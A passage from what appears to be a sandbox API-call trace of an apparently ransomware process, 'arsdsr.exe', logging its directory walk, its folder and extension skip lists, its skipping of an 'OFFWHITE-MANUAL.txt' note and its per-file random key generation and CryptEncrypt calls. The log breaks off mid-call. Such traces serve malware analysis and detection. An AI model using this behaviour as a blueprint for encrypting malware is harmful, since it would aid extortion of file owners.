Users\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\" [0147.217] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\" [0147.217] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*" [0147.218] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.219] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.219] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.219] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.219] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.219] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0147.219] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.219] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="Queue", cAlternateFileName="")) returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2=".") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="..") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="...") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="windows") returned -1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="$recycle.bin") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="rsa") returned -1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="ntuser.dat") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="programdata") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="appdata") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="program files") returned 1 [0147.219] lstrcmpiW (lpString1="Queue", lpString2="program files (x86)") returned 1 [0147.219] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.219] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="Queue" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0147.219] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\" [0147.219] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\" [0147.220] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*" [0147.220] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.220] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.220] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.220] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.220] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.220] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0147.220] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.220] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2=".") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="..") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="...") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="windows") returned -1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="$recycle.bin") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="rsa") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="ntuser.dat") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="programdata") returned 1 [0147.220] lstrcmpiW (lpString1="SentItems", lpString2="appdata") returned 1 [0147.221] lstrcmpiW (lpString1="SentItems", lpString2="program files") returned 1 [0147.221] lstrcmpiW (lpString1="SentItems", lpString2="program files (x86)") returned 1 [0147.221] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.221] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="SentItems" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" [0147.221] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\" [0147.221] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\" [0147.221] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*" [0147.221] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.221] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.221] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.221] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.221] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.221] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0147.221] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.221] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0147.221] lstrcmpiW (lpString1="VirtualInbox", lpString2=".") returned 1 [0147.221] lstrcmpiW (lpString1="VirtualInbox", lpString2="..") returned 1 [0147.221] lstrcmpiW (lpString1="VirtualInbox", lpString2="...") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="windows") returned -1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="$recycle.bin") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="rsa") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="ntuser.dat") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="programdata") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="appdata") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="program files") returned 1 [0147.222] lstrcmpiW (lpString1="VirtualInbox", lpString2="program files (x86)") returned 1 [0147.222] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.222] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="VirtualInbox" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0147.222] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\" [0147.222] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\" [0147.222] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*" [0147.222] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.222] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.222] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.222] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.222] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.222] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 1 [0147.222] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="rsa") returned -1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="programdata") returned -1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="program files") returned -1 [0147.223] lstrcmpiW (lpString1="en-US", lpString2="program files (x86)") returned -1 [0147.223] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\" [0147.223] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\", lpString2="en-US" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0147.223] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\" [0147.223] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\" [0147.223] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*.*" [0147.223] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e007c, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.224] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.224] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e007c, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.224] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.224] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.224] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x7e007c, dwReserved1=0x295d670, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 1 [0147.224] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2=".") returned 1 [0147.224] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="..") returned 1 [0147.224] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="...") returned 1 [0147.224] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="windows") returned -1 [0147.224] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="$recycle.bin") returned 1 [0147.224] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="rsa") returned 1 [0147.225] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="ntuser.dat") returned 1 [0147.225] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="programdata") returned 1 [0147.225] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="appdata") returned 1 [0147.225] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="program files") returned 1 [0147.225] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="program files (x86)") returned 1 [0147.225] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\" [0147.225] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\", lpString2="WelcomeFax.tif" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" [0147.225] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.225] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.225] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".exe") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".log") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".cab") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".cmd") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".com") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".cpl") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".ini") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".dll") returned 1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".url") returned -1 [0147.225] lstrcmpiW (lpString1=".tif", lpString2=".ttf") returned -1 [0147.226] lstrcmpiW (lpString1=".tif", lpString2=".mp3") returned 1 [0147.226] lstrcmpiW (lpString1=".tif", lpString2=".pif") returned 1 [0147.226] lstrcmpiW (lpString1=".tif", lpString2=".mp4") returned 1 [0147.226] lstrcmpiW (lpString1=".tif", lpString2=".OFFWHITE") returned 1 [0147.226] lstrcmpiW (lpString1=".tif", lpString2=".msi") returned 1 [0147.226] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0147.226] GetProcessHeap () returned 0x500000 [0147.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b58 [0147.226] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.226] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0147.226] GetProcessHeap () returned 0x500000 [0147.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b08 [0147.226] GetProcessHeap () returned 0x500000 [0147.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b20 [0147.226] GetProcessHeap () returned 0x500000 [0147.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565a70 [0147.226] GetProcessHeap () returned 0x500000 [0147.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565b78 [0147.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.227] SystemFunction036 (in: RandomBuffer=0x543b08, RandomBufferLength=0x10 | out: RandomBuffer=0x543b08) returned 1 [0147.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.227] SystemFunction036 (in: RandomBuffer=0x543b20, RandomBufferLength=0x10 | out: RandomBuffer=0x543b20) returned 1 [0147.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.227] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565a70*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565a70*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.227] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565b78*, 